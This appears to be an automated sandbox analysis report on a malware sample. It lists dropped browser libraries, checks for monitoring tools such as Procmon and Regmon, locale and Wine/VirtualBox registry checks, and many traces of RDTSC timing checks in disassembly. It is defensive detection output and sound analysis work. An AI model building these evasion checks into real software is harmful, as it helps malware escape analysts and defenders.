Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00059860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-58238

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 407E8B second address: 407E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 407E8F second address: 407E99 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2DFC4C7106h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 42472A second address: 424734 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2DFCDF716Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 42490D second address: 424913 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 424913 second address: 424922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F2DFCDF7156h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 424CED second address: 424D18 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2DFC4C7112h 0x00000008 jmp 00007F2DFC4C7111h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 424FE0 second address: 424FEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F2DFCDF7156h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 427113 second address: 4271A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 add dword ptr [esp], 4CB9257Bh 0x0000000b push edi 0x0000000c mov dword ptr [ebp+122D27C4h], edx 0x00000012 pop edx 0x00000013 or dword ptr [ebp+122D2F64h], ebx 0x00000019 push 00000003h 0x0000001b mov edx, dword ptr [ebp+122D375Ch] 0x00000021 push 00000000h 0x00000023 jmp 00007F2DFC4C7116h 0x00000028 push 00000003h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F2DFC4C7108h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 mov edi, dword ptr [ebp+122D3734h] 0x0000004a mov cx, 28F6h 0x0000004e call 00007F2DFC4C7109h 0x00000053 jns 00007F2DFC4C7113h 0x00000059 push eax 0x0000005a je 00007F2DFC4C7112h 0x00000060 jl 00007F2DFC4C710Ch 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4271A1 second address: 42720F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [esp+04h] 0x00000008 pushad 0x00000009 jnl 00007F2DFCDF7158h 0x0000000f jmp 00007F2DFCDF715Eh 0x00000014 popad 0x00000015 mov eax, dword ptr [eax] 0x00000017 jo 00007F2DFCDF7163h 0x0000001d jmp 00007F2DFCDF715Dh 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 jmp 00007F2DFCDF7161h 0x0000002b pop eax 0x0000002c sub edi, 32E95600h 0x00000032 lea ebx, dword ptr [ebp+12458FE3h] 0x00000038 jns 00007F2DFCDF715Ch 0x0000003e mov dword ptr [ebp+122D2F17h], eax 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push ecx 0x00000048 js 00007F2DFCDF7156h 0x0000004e pop ecx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 42726B second address: 427318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edi, dword ptr [ebp+122D2801h] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F2DFC4C7108h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d add edi, 081EEE35h 0x00000033 push D03E8542h 0x00000038 jp 00007F2DFC4C7110h 0x0000003e add dword ptr [esp], 2FC17B3Eh 0x00000045 push esi 0x00000046 movsx esi, di 0x00000049 pop edi 0x0000004a push 00000003h 0x0000004c mov dword ptr [ebp+122D283Ah], esi 0x00000052 push 00000000h 0x00000054 mov dword ptr [ebp+122DB5CAh], ebx 0x0000005a push 00000003h 0x0000005c or si, 25C5h 0x00000061 call 00007F2DFC4C7109h 0x00000066 jno 00007F2DFC4C7119h 0x0000006c push eax 0x0000006d jnl 00007F2DFC4C710Ah 0x00000073 push esi 0x00000074 pushad 0x00000075 popad 0x00000076 pop esi 0x00000077 mov eax, dword ptr [esp+04h] 0x0000007b pushad 0x0000007c pushad 0x0000007d pushad 0x0000007e popad 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 427318 second address: 427326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007F2DFCDF7156h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 427326 second address: 427334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 427334 second address: 427338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 427338 second address: 42733E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 42733E second address: 42734C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2DFCDF715Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 42734C second address: 4273A9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2DFC4C7106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jnc 00007F2DFC4C7110h 0x00000016 pop eax 0x00000017 mov di, ED6Fh 0x0000001b lea ebx, dword ptr [ebp+12458FECh] 0x00000021 mov dword ptr [ebp+122D290Ch], ecx 0x00000027 jbe 00007F2DFC4C710Ch 0x0000002d add dword ptr [ebp+122D27C9h], edx 0x00000033 push eax 0x00000034 pushad 0x00000035 pushad 0x00000036 jmp 00007F2DFC4C7117h 0x0000003b pushad 0x0000003c popad 0x0000003d popad 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 427404 second address: 42746C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFCDF715Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnl 00007F2DFCDF716Eh 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D2F84h], ebx 0x00000017 and di, 462Bh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007F2DFCDF7158h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000019h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 push F25C38E0h 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 42746C second address: 427473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 427473 second address: 42751E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFCDF7169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 0DA3C7A0h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F2DFCDF7158h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a jl 00007F2DFCDF7156h 0x00000030 jmp 00007F2DFCDF7166h 0x00000035 push 00000003h 0x00000037 jmp 00007F2DFCDF7168h 0x0000003c push 00000000h 0x0000003e mov dh, EDh 0x00000040 push 00000003h 0x00000042 and cl, FFFFFF93h 0x00000045 mov ecx, ebx 0x00000047 call 00007F2DFCDF7159h 0x0000004c push esi 0x0000004d pushad 0x0000004e jmp 00007F2DFCDF7165h 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 42751E second address: 42759C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e jg 00007F2DFC4C7108h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jg 00007F2DFC4C711Ah 0x00000021 jc 00007F2DFC4C7114h 0x00000027 jmp 00007F2DFC4C710Eh 0x0000002c mov eax, dword ptr [eax] 0x0000002e jmp 00007F2DFC4C7111h 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 jmp 00007F2DFC4C7114h 0x0000003c pop eax 0x0000003d sub dword ptr [ebp+122D2824h], ecx 0x00000043 lea ebx, dword ptr [ebp+12458FF7h] 0x00000049 sub si, BCE7h 0x0000004e mov edx, dword ptr [ebp+122D3818h] 0x00000054 xchg eax, ebx 0x00000055 push ecx 0x00000056 push eax 0x00000057 push edx 0x00000058 push ebx 0x00000059 pop ebx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44604E second address: 446056 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4461B0 second address: 4461EA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2DFC4C7112h 0x00000008 je 00007F2DFC4C711Dh 0x0000000e jmp 00007F2DFC4C7117h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4461EA second address: 446204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2DFCDF715Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F2DFCDF7156h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4477F9 second address: 447805 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F2DFC4C7106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 447805 second address: 44785F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2DFCDF7168h 0x00000008 jmp 00007F2DFCDF7169h 0x0000000d jnp 00007F2DFCDF7156h 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007F2DFCDF715Dh 0x0000001a push edx 0x0000001b pop edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jc 00007F2DFCDF716Fh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44785F second address: 447876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2DFC4C7113h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4479D5 second address: 447A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jnc 00007F2DFCDF7156h 0x0000000f popad 0x00000010 pop edx 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007F2DFCDF715Eh 0x00000018 jmp 00007F2DFCDF715Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 447A07 second address: 447A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2DFC4C7112h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4508BD second address: 4508C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 454F3C second address: 454F44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 454F44 second address: 454F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4552B3 second address: 4552B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4552B9 second address: 4552BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 455536 second address: 45553A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45553A second address: 45553F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 455662 second address: 455686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jns 00007F2DFC4C7106h 0x0000000c jmp 00007F2DFC4C7117h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4557B8 second address: 4557BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4557BD second address: 4557DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2DFC4C7117h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4557DA second address: 4557DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 457005 second address: 45702B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F2DFC4C7113h 0x00000008 pop edx 0x00000009 jl 00007F2DFC4C7108h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45702B second address: 45704A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2DFCDF7156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2DFCDF7163h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45704A second address: 45704E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45704E second address: 45705E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F2DFCDF7156h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4098C9 second address: 4098CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4098CE second address: 4098D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 458F6D second address: 458F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 458F71 second address: 458F89 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F2DFCDF7158h 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 458F89 second address: 458F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4590D8 second address: 4590E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45933A second address: 45933E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4594DE second address: 4594E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F2DFCDF7156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4594E8 second address: 4594EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4594EC second address: 459504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2DFCDF715Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 459504 second address: 459508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 459508 second address: 45950E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 459BC1 second address: 459BC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 459BC6 second address: 459C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebx 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F2DFCDF7158h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 xor dword ptr [ebp+122DB5CAh], eax 0x0000002a push eax 0x0000002b pushad 0x0000002c push ebx 0x0000002d jo 00007F2DFCDF7156h 0x00000033 pop ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 459C04 second address: 459C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 459FF5 second address: 459FF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45A143 second address: 45A186 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2DFC4C710Ah 0x00000008 jmp 00007F2DFC4C7113h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007F2DFC4C7112h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jc 00007F2DFC4C7106h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45A186 second address: 45A1A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007F2DFCDF715Dh 0x0000000d mov di, dx 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45A1A5 second address: 45A1B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFC4C710Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45A1B3 second address: 45A1D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFCDF715Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F2DFCDF7156h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45A692 second address: 45A6CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F2DFC4C7108h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 clc 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D2788h], esi 0x0000002c xor dword ptr [ebp+122D268Bh], edx 0x00000032 push 00000000h 0x00000034 xchg eax, ebx 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push esi 0x00000039 pop esi 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45A6CF second address: 45A701 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFCDF7164h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2DFCDF7166h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45B032 second address: 45B04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2DFC4C710Ch 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45B04B second address: 45B051 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45B051 second address: 45B057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45B057 second address: 45B05B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
